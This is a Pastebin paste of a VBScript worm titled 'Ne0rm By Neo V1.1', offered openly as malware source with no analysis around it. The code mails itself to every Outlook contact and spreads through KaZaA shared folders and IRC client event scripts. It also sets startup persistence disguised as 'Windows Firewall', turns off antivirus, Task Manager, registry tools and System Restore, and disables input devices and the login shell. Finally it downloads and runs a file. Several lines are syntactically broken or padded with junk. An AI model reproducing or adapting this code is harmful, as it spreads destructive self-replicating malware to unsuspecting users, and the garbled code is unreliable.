Advertisement
NeoHr

Ne0rm By Neo V1.1

Apr 5th, 2015
343
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2.  
  3. ' Ne0rm By Neo V1.1
  4. 'Generated With Ne0rm By Neo V1.1
  5. Dim x
  6. Set fso ="Scripting.FileSystem.Object"
  7. Set so=CreateObject(fso)
  8. Set ol=CreateObject("Outlook.Application")
  9. Set out= WScript.CreateObject("Outlook.Application")
  10. Set mapi = out.GetNameSpace("MAPI")
  11. Set a = mapi.AddressLists(1)
  12. For x=1 To a.AddressEntries.Count
  13. Set Mail=ol.CreateItem(0)
  14. Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
  15. Mail.Subject="Hacked by NE0"
  16. Mail.Body="Hacked by NE0"
  17. Mail.Attachments.Add Wscript.ScriptFullName
  18. Mail.Send
  19. Next
  20. ol.Quit
  21. set fso=CreateObject("Scripting.FileSystemObject")
  22. fso.CopyFile Wscript.ScriptFullName, "C:\Kazaa\lul", True
  23. If fso.FolderExists("C:\Program Files\KaZaA") then
  24. set KaZaA = "C:\Program Files\KaZaA\My Shared Folder\lul.vbs"
  25. fso.CopyFile Wscript.ScriptFullName,KaZaA
  26. End If
  27. If fso.FolderExists("C:\Program Files\KaZaA Lite\") then
  28. set KaZaALite = "C:\Program Files\KaZaA Lite\My Shared Folder\lul.vbs"fso.CopyFile Wscript.ScriptFullName,KaZaALite
  29. End If
  30. set shell=CreateObject("WScript.Shell")
  31. shell.RegWrite "HKLM\\Software\\KaZaA\\Transfer\\DlDir0", "C:\Kazaa");
  32. Dim x
  33. set fso=CreateObject("Scripting.FileSystemObject")
  34. set x=fso.CreateTextFile("C:\mirc\script.ini")
  35. fso.CopyFile Wscript.ScriptFullName, "C:\mirc\lulvbs", True
  36. x.WriteLine "[script]"
  37. x.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\lul }
  38. x.Close
  39. Dim pirch
  40. set fso=CreateObject("Scripting.FileSystemObject")
  41. set mirc=fso.CreateTextFile("C:\pirch98\events.ini")
  42. fso.CopyFile Wscript.ScriptFullName, "C:\mirc\lul.vbs", True
  43. pirch.WriteLine "[Levels]");
  44. pirch.WriteLine "Enabled=1");
  45. pirch.WriteLine "Count=6");
  46. pirch.WriteLine "Level1=000-Unknows"
  47. pirch.WriteLine "000-UnknowsEnabled=1"
  48. pirch.WriteLine "Level2=100-Level 100"
  49. pirch.WriteLine "100-Level 100Enabled=1"
  50. pirch.WriteLine "Level3=200-Level 200"
  51. pirch.WriteLine "200-Level 200Enabled=1"
  52. pirch.WriteLine "Level4=300-Level 300"
  53. pirch.WriteLine "300-Level 300Enabled=1"
  54. pirch.WriteLine "Level5=400-Level 400"
  55. pirch.WriteLine "400-Level 400Enabled=1"
  56. pirch.WriteLine "Level6=500-Level 500"
  57. pirch.WriteLine "500-Level 500Enabled=1"
  58. pirch.WriteLine "[000-Unknowns]"
  59. pirch.WriteLine "User1=*!*@*"
  60. pirch.WriteLine "UserCount=1"
  61. pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\lul.vbs"
  62. pirch.WriteLine "EventCount=1"
  63. pirch.WriteLine "[100-Level 100]"
  64. pirch.WriteLine "UserCount=0"
  65. pirch.WriteLine "EventCount=0"
  66. pirch.WriteLine "[200-Level 200]"
  67. pirch.WriteLine "UserCount=0"
  68. pirch.WriteLine "EventCount=0"
  69. pirch.WriteLine "[300-Level 300]"
  70. pirch.WriteLine "UserCount=0"
  71. pirch.WriteLine "EventCount=0"
  72. pirch.WriteLine "[400-Level 400]"
  73. pirch.WriteLine "UserCount=0"
  74. pirch.WriteLine "EventCount=0"
  75. pirch.WriteLine "[500-Level 500]"
  76. pirch.WriteLine "UserCount=0"
  77. pirch.WriteLine "EventCount=0"
  78. pirch.Close
  79. set fso=CreateObject("Scripting.FileSystemObject")
  80. fso.CopyFile Wscript.ScriptFullName, "C:\Virc\lul.vbs", True
  81. set shell=CreateObject("WScript.Shell")
  82. shell RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\lul.vbs"
  83. Dim reg
  84. set fso=CreateObject("Scripting.FileSystemObject")
  85. set path = C:\windows
  86. fso.CopyFile Wscript.ScriptFullName,path
  87. Set reg = Createobject("Wscript.Shell")
  88. reg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Windows Firewall", "C:\Windows\logon.vbs", "REG_SZ"
  89. Dim reg
  90. set fso=CreateObject("Scripting.FileSystemObject")
  91. set path = C:\windows
  92. fso.CopyFile Wscript.ScriptFullName,path
  93. Set reg = Createobject("Wscript.Shell")
  94. reg.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Firewall", "C:\Windows\logon.vbs", "REG_SZ"
  95. set fso=CreateObject("Scripting.FileSystemObject")
  96. set path = C:\Windows\Start Menu\Programs\StartUp\winlogon.exe.vbs
  97. fso.CopyFile Wscript.ScriptFullName,path
  98. set fso=CreateObject("Scripting.FileSystemObject")
  99. set path = C:\Windows\Startmenü\Programme\Autostart\winlogon.exe.vbs
  100. fso.CopyFile Wscript.ScriptFullName,path
  101. if Day(now) = 10 & Month(now) = 4 then
  102. Dim reg
  103. Set reg = Createobject("Wscript.Shell")
  104. reg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
  105. Dim reg
  106. Set reg = Createobject("Wscript.Shell")
  107. reg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
  108. Dim reg
  109. Set reg = Createobject("Wscript.Shell")
  110. reg.regwrite "HKCU\Control Panel\Accessibility\Keyboard Response\Flags", "127", "REG_SZ"
  111. reg.regwrite "HKCU\Control Panel\Accessibility\SoundSentry\Flags", "3", "REG_SZ"
  112. reg.regwrite "HKCU\Control Panel\Accessibility\SoundSentry\WindosEffect", "3", "REG_SZ"
  113. reg.regwrite "HKLM\SYSTEM\CurrentConrolSet\Services\MouClass\Start", "4", "REG_DWORD"
  114. Dim reg
  115. Set reg = Createobject("Wscript.Shell")
  116. reg.regwrite "HKLM\SYSTEM\CurrentConrolSet\Services\MouClass\Start", "4", "REG_DWORD"
  117. Msgbox "Hacked by NE0",16,"Hacked by NE0"
  118.  
  119. End if
  120. Dim reg
  121. Set reg = Createobject("Wscript.Shell")
  122. reg.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
  123. Dim reg
  124. Set reg = Createobject("Wscript.Shell")
  125. reg.regwrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",""
  126. Dim reg
  127. Set reg = Createobject("Wscript.Shell")
  128. reg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Neo", "REG_SZ"
  129. Dim reg
  130. Set reg = Createobject("Wscript.Shell")
  131. reg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganisation","CyBER-71", "REG_SZ"
  132. Dim reg
  133. Set reg = Createobject("Wscript.Shell")
  134. reg.regwrite "HKLM\Software\Microsoft\Windows\Internet Explorer\Main","https://www.google.com", "REG_SZ"
  135. On Error Resume Next
  136. AutoOff = "."
  137. Set oWMI = GetObject("winmgmts://.")
  138. AutoOffName = "Norton AntiVirus Auto-Protect Service"
  139. sWQL = "Select state from Win32_Service " & "Where displayname='" & AutoOffName & "'"
  140. Set oResults = oWMI.ExecQuery(sWQL)
  141. For Each oService In oResults
  142. oService.StopService
  143. oService.ChangeStartMode("Disabled")
  144. Next
  145. On Error Resume Next
  146. If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  147.  CommandBars("Macro").Controls("Security...").Enabled = False
  148.  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
  149. Else
  150.  CommandBars("Tools").Controls("Macro").Enabled = False
  151.  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
  152. End If
  153. Dim reg
  154. Set reg = Createobject("Wscript.Shell")
  155. reg.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1", "REG_DWORD"
  156. Dim reg
  157. Set reg = Createobject("Wscript.Shell")
  158. reg.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose","1", "REG_DWORD"
  159. Dim reg
  160. Set reg = Createobject("Wscript.Shell")
  161. reg.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogoff","1", "REG_DWORD"
  162. Dim reg
  163. Set reg = Createobject("Wscript.Shell")
  164. reg.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1", "REG_DWORD"
  165. Dim reg
  166. Set reg = Createobject("Wscript.Shell")
  167. reg.regwrite "HKCU\Control Panel\Mouse\SwapMouseButtons","1", "REG_SZ"
  168. Dim reg
  169. Set reg = Createobject("Wscript.Shell")
  170. reg.regwrite "HKCU\Control Panel\Mouse\MouseSpeed","10", "REG_SZ"
  171. Set CB8E2 = createobject("wscript.shell")
  172. C82KB4M2.run "https://www.google.com",false
  173. Dim reg
  174. Set reg = Createobject("Wscript.Shell")
  175. reg.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by NE0", "REG_SZ"
  176. Set oWMP = CreateObject("WMPlayer.OCX.7" )
  177. Set colCDROMs = oWMP.cdromCollection
  178.  
  179. if colCDROMs.Count >= 1 then
  180.         For i = 0 to colCDROMs.Count - 1
  181.                 colCDROMs.Item(i).Eject
  182.         Next ' cdrom
  183. End If
  184. Set objShell = CreateObject( "Wscript.Shell" )
  185. objShell.Run "%windir%\System32\rundll32.exe user32.dll,LockWorkStation"
  186. Set Shell = CreateObject( "WScript.Shell" )
  187. Dim AK
  188. Dim xmb
  189. WScript.Sleep(50000)
  190. abce = "MLH"
  191. Set xmb = CreateObject("Microsoft.X"+abce+"TTP")
  192. xmb.Open "GET", "https://www.google.com.bd/images/srpr/logo11w.png", False
  193. xmb.Send
  194. C=C=C=C
  195. AK = xmb.ResponseBody
  196. C=C=C=C
  197. Const adTypeBinary = 1
  198. Const adSaveCreateOverWrite = 2
  199. C=C=C=C
  200. Dim BinaryStream
  201. C=C=C=C
  202. Set BinaryStream = CreateObject("ADODB.Stream")
  203. BinaryStream.Type = adTypeBinary
  204. A=A=A=A
  205. BinaryStream.Open
  206. BinaryStream.Write AK
  207. b=b=b=b
  208. BinaryStream.SaveToFile "lul", adSaveCreateOverWrite
  209. Shell.ShellExecute "lul","","","open",0
  210. Dim fso, f, write
  211. Set fso = CreateObject("Scripting.FileSystemObject")
  212. If fso.FolderExists("C:\Temp") Then
  213. Else
  214. Set f = fso.CreateFolder("C:\Temp")
  215. End If
  216. Set fso = CreateObject("Scripting.FileSystemObject")
  217. Set Write = fso.CreateTextFile("C:\Temp\message.txt", True)
  218. Write.WriteLine("Hacked by NE0")
  219. Write.Close
  220. TargetFolder = "C:\Temp"
  221. Set objShell = CreateObject("Shell.Application")
  222. Set objFolder = objShell.Namespace(TargetFolder)
  223. Set colItems = objFolder.Items
  224. For Each objItem in colItems
  225.     objItem.InvokeVerbEx("Print")
  226. Next
  227. Dim reg
  228. Set reg = Createobject("Wscript.Shell")
  229. reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD"
  230. reg.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD"
  231. Dim reg
  232. Set reg = Createobject("Wscript.Shell")
  233. reg.regwrite "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\EditionName","Hacked by NE0","REG_SZ"reg.regwrite "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\ProductName","Hacked by NE0","REG_SZ"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement